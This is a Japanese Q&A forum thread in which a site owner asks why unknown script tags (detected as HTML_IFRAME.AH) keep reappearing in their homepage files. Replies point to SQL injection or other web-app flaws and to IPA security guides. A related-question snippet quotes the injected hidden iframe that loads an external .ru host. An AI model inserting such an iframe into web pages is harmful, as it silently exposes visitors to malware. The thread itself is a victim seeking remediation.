- 締切済み
ホームページがウィルスにやられてしまいました
私はメモ帳でタグ打ちしたホームページ(以下HP)と、HPソフトを使って作るHPをふたつつくっているのですが(サーバとスペースは別です)、ある日メモ帳でタグ打ちしたHPの表示がおかしいのでタグを調べてみたら書いた覚えのない見知らぬスクリプトタグ(そのタグにはURLとおかしな文字が書き込まれています)が書き込まれていました。 ウィルス検索をしたところトレンド社のオンラインスキャンで 「HTML_IFRAME.AH」というウィルスが検出されました。 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_IFRAME.AH (ちなみにマイパソコンのウィルスソフトシ○ンテックでは削除どころか検知もしませんでした。) このウィルス情報によると、スクリプトタグが危険ということなのでスクリプトで書かれているタグを消し(カウンターなどです)、ウェブにあげてあるページをすべて消してからHPを再アップしたのですが、またしても見知らぬスクリプトタグが書き込まれてしまいました。 そこでパソコンにあるHPファイルをすべて削除し新しくページを作り直したり、ソフトを変えたり、パソコンを変えて一からすべて作り直したのにもかかわらず(この間、ファイルの共有はしておりません。)メモ帳でタグ打ちしたHPだけでなく、HPソフトを使って作るHP、その両方になんどやっても、見知らぬスクリプトタグが書き込まれてしまいます。(ちなみに見知らぬスクリプトタグが記入されるのは、indexとmainにかぎられます。) この間もいろいろなウィルスソフトでパソコンとファイルをウィルス検索しましたがまったくなにも検知されません ちなみにマイパソコンはビスタでセキュリティホールはゼロです。 根本的にこのスクリプトタグを書き込ませない、削除する方法はないでしょうか。 また、パソコンはやはり初期化したほうがよいでしょうか。(すでにこれは試しましたが駄目でした。) それとメモ帳タグ打ちのタグはプロバイダーのホームページ作成ページを参考に作っています。 アドバイスお願いします。
- goro563
- お礼率88% (15/17)
- ウィルス・マルウェア
- 回答数3
- ありがとう数3
- みんなの回答 (3)
- 専門家の回答
みんなの回答
- wamos101
- ベストアンサー率25% (221/852)
当方、アングラ突入調査や対策ソフトなどのテストをしております。 #2さんの言うSQLインジェクションという手法はあくまで一つの手法に過ぎませんし、今回これに当てはまるのかどうかもわかりません。Web改竄にはこれ以外にも複数の手法があります。 ただ、いずれにしてもサービス提供者側のアプリに何らかの問題がある可能性が高いです。 今、その筋の世界ではWebアプリの脆弱性を自動的に見つけ出しExploitを挿入するツールが出回ってます。
- seadragon
- ベストアンサー率44% (361/820)
SQLインジェクション攻撃の可能性があります。 Webサイトの改ざん攻撃が拡大、世界で数十万ページが被害 http://www.itmedia.co.jp/enterprise/articles/0804/25/news020.html トレンドマイクロのウイルス情報ページが改竄、ウイルスを埋め込まれる http://internet.watch.impress.co.jp/cda/news/2008/03/12/18775.html 作成したHP自体に脆弱性がある可能性があるので改善が必要です。 まず「ウェブサイトのSQLインジェクション脆弱性の検出ツール」 http://www.ipa.go.jp/security/vuln/iLogScanner.html にて問題がないか確認して下さい。 問題がなければ以下を参考にサイトを再構築すると良いでしょう。 「安全なウェブサイトの作り方 改訂第3版」 http://www.ipa.go.jp/security/vuln/websecurity.html 「ウェブサイト運営者のための脆弱性対応ガイド」 http://www.ipa.go.jp/security/fy19/reports/vuln_handling/ind... 情報処理推進機構に対応策を問い合わせるのも良いかもしれません。 http://www.ipa.go.jp/security/ciadr/index.html PCはリカバリーをされたという事なのでウイルス対策ソフトを導入 しているのでしたら問題なと思います。
お礼
親切丁寧に情報を教えていただき、ありがとうございました。 ウィルス情報だけではなく、サイトづくりの情報も教えていただきとても助かりました。 すべての情報を参考に対策をたてたいとおもいます。 本当にありがとうございました。
- FMVNB50GJ
- ベストアンサー率27% (411/1520)
参考アドレスの対処方法に従っても検出されることですか。 どこから検出されるのでしょう。 アイフレームは誰かが書き込むと思いますが、書き込めるものなんですかね。 {攻撃者がWebページを改ざんした方法については,いろいろな意見があるものの,ハッキリしたことは分かっていない。} http://itpro.nikkeibp.co.jp/article/COLUMN/20070801/278778/?ST=csirt そのパソコンがサーバーで世界中からアクセス可能ということでしょうか。 参考まで。
お礼
ウィルスの検出場所ですが、このウィルスはブラウザのキャッシュを悪用したものなのでインターネット一時ファイルが保存される場所とおなじだと思われます。 それとこのパソコンがサーバを通じて世界中からアクセスされている可能性についてはなんとも言えませんが、XP以降ウィンドウズにはリモート機能が付いていますから インターネットにつないでいる全世界のXP以降のパソコンすべてが同様に危険と考えるとすえ恐ろしい限りです 教えていただいたURLは参考になりました。 ありがとうございました。
関連するQ&A
- ホームページのウイルス?スパム?について・・・
ホームページを作成して約2年ほど公開しています。 ここ1ヵ月もたたないぐらいから作成したホームページを閲覧するとページの表示のされかたがおかしく、ページのトップがmargin-top200pxぐらい自動でかかっています。 しかもウイルスソフトにも引っかかります。 自分の記入ミスだと思い、確認したのですが、記述に間違いはなくページのtopにmargin-top200pxの記述はしていませんでした。 不気味に思ったので、サーバーにあがっているファイルを一時削除してもう一度アップしなおしました。 ところが数日後また同じ現象が起きていました。 毎回ウイルスソフトが「アクセスしたファイルは感染しています」と表示されます。 おかしいと思ったので、表示されているページのソースをブラウザ上からみたところ<html><head></head><body>のところに <iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe> という記述がありました。 これを調べたのですが、何も得られず、削除をしても数日後には復活しています。 また、必ずindex.htmlファイルが感染しているようです。 他のページ(member.html)などは感染していませんでした。 友達のPC(ウイルスバスター)でも引っかかると言っていました。 自分のはウイルスソフトはAVGを使用しています。 質問内容はまずどのようにしたら感染しているものを削除できるのでしょうか? また、<iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe>はなんでしょうか? ご教授お願いします。
- 締切済み
- ネットワーク
- タグ打ちでHTML(ホームページ)を作成する場合
市販やフリーのHP作成ソフトを使わずに、 タグ打ちでHTMLファイルを作成する場合、 現在の最も一般的な使用ソフトは何でしょうか? 例えば、メモ帳とか、ワードとかです。 何年か前にHPを作った事があり、また作ろうかと思うのですが、 HTMLファイルをクリックして開いたページから、ソースを開く、とやると、 行番号の付いたメモ帳みたいなのが開きます。 しかし、昔みたいにこのソフト上では編集が出来ないんです。 今は、何か新しい方法でHTMLを作成するのかなあと思った次第です。 ※パソコンはWin7 IE 9 です。 よろしくお願いします。
- ベストアンサー
- HTML
- ホームページのウイルス?
最近ホームページを立ち上げました。 OSはMAC10.3。FTP送信ソフトはFTECHを使っています。 それで、リンクをあるサイトへお願いしたのですが、管理者がページを見たところ、あるページへ行くとウイルス対策ソフト(ノートンだそうです)の警告が表示され遮断されてしまうそうです。 スクリプト等、特に変わったことをしているわけでもありません。タグで単純に組んであるだけです。 自分のパソコンが感染していなくても、ページ??だけウイルスに感染しているのでしょうか? それともタグの組み方などでバグが発生したりするのでしょうか? よろしければ、お教え下さい。
- ベストアンサー
- Mac
- avast入れたらウイルスが
インターネットにつないでいないパソコンにavast入れたら、なんかウイルスを検知しました。 同じところから同じウイルスを何度も検知して削除しても削除して同じメッセージがでます。わずらわしいのでavastをアンストールしました。 おそらくほかのパソコンからダウンロードした画像とかファイルにウイルスが入っていて、USBメモリを解して進入されたとおもうのです。 でもインターネットにつないでいないし、使っていて特に問題はありません。 気にしないでいいですか? それともavast入れてウイルスメッセージが出なくなるまで削除し続けたほういいですか?チェストに入れて削除しても削除しても同じ場所から2種類のウイルスを永延に検知しています。 こんなこと一度もありませんでした。
- 締切済み
- ウィルス・マルウェア
- ウイルスに取り付かれました。
私も同じでウイルスバスター2008の警告表示が赤い枠でウイルスがみつかりましたと出ました。隔離不能、手動で削除してくださいと出てますが対応方法は英語なので何をどうすればよいのか分かりません!このまま放っておくとやはり大変な事に成ってしまうのでしょうか?教えてください。心配で徹夜しています。PC屋に持っていくのがベストでしょうか? ウイルス名:HTML_IFRAME.AH ファイル名:C:...\rrt[1].htm
- ベストアンサー
- ウィルス・マルウェア
- PHPファイルがウィルスに感染
こういうのはよくあることなのか、わかりませんが HPを修正する為にFTPでつないでファイルをDLしたところ、 数個のPHPファイルが『http/Iframe』というウィルスに感染していました。 これらのファイルはアンチウィルスソフトによって隔離されてしまったので詳細は不明ですが、 このHttp/Iframeとはどのようなウィルスなのでしょうか? また、PHPファイルが感染していたということは、 ファイルのコードが何者かによって書き換えられていたということでしょうか? このウィルスについて何かわかる方いましたら、お願いします。
- 締切済み
- PHP
- ウイルスなのでしょうか?
はじめて質問させて頂きます。 パソコン初心者ですので何分失礼を おかけするかもしれませんがどうぞ宜しく お願いいたします。 質問ですが先週ネットを楽しんでいたら 変なHPにアクセスしてしまいました。 するとウイルスソフトで検知して「トロイの木馬です注意」 と出たので慎重に削除したのですが、 何度も表示されたので、ネットを切断しました。 感染してるかと思い、無料の検知ソフトを使ってパソコンを チェックしましたが、入っていないようでした。 いいと思ってIEをクリックしたらつながりません。 当然メールも確認できません。 設定を確認しても間違ってはいないし、 特に大きな変更もしてません。 理由がウイルスHP以外考えられず、 どうしたらいいかわかりません・・・ ちなみに無線LAN接続です。 どうか宜しくお願いいたしますm--m パソコン環境 OS XPsp2 ブラウザ IE6sp2 無料ソフト avast!
- 締切済み
- ネットワーク
- ウィルス削除について教えてください
トレンドマイクロのウィルスバスターオンラインスキャン を行ったらウィルスが検知されました。 あわててそのウィルスのことを調べているうちに誤って 検索結果のページを閉じてしまいました。 その後、再度オンラインスキャンを実行したら 今度はウィルスが検知されませんでした。 こういう場合他に何かウィルスを検索する手立てを ご存知の方いらっしゃいますか? ちなみに検知されたウィルスは「HTML_IFRMEXP.GEN」 I/Eのバージョンは6.0です。 ウィルス情報を見るとI/E6.0には影響のないウィルス だというようなことが書いてあるのですが、 専門用語がならんでいて詳細が分かりません。 ネットで色々調べていると感染した方が書いているHPに 「このウィルスは発見した瞬間にウィルスが動作しない 場所に隔離されている」とも書いてありとても不安です。 WINDOWS UPDATEまめにやったり、 添付ファイルは開かないようにしていたのですが (というかプロバイダー側で添付ファイルは 削除する設定になっている) やはり対策ソフトを入れないとだめなんでしょうか。 ご存知の方いらしたらどうぞ宜しくお願いします。
- 締切済み
- ウィルス・マルウェア
- ウイルス対応方法
ついさっきウイルスバスター2007ウイルスが検出されました。 HTML_IFRAME.AH ってやつです 対応方法をみてみると手動で削除しろってなってますが、ウイルスバスターのとこにある削除ってとこをクリックできせん・・・ 手動ってそのファイルのとこにいってゴミ箱いれるってことですか・ ウイルスにたいしては初めてでよくわからないので指導お願いします OS WinXP http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML%5FIFRAME%2EAH&VSect=Sn
- ベストアンサー
- その他(インターネット・Webサービス)
- ウイルス感染のホームページを削除したい。助けてください。
アップロードしているホームページが10日ほど前からウイルス感染し、自分ではどうにもできませんので、息子に復旧してもらうことにしたのですが、簡単には行かず、一度パソコン内の作成ファイルをSDカードに抜き出してからすべてのアプリケーションを削除した時に、デスクトップにあったホームページのファイルも削除してしまったのです。 多くのHP訪問者にご迷惑をおかけしていますので、ウイルス感染のHPを消し去る方法をどなたか教えてください。
- ベストアンサー
- レンタルサーバ・ASP
お礼
回答ありがとうございました。 ここに質問を書き込む前にサービス提供者会社に問い合わせてはみたのですが、たらいまわしにされお手上げ状態だったので質問を書き込んだしだいです。 いずれにしてもサービス提供者側のセキュリティ対策は確認したいと思います。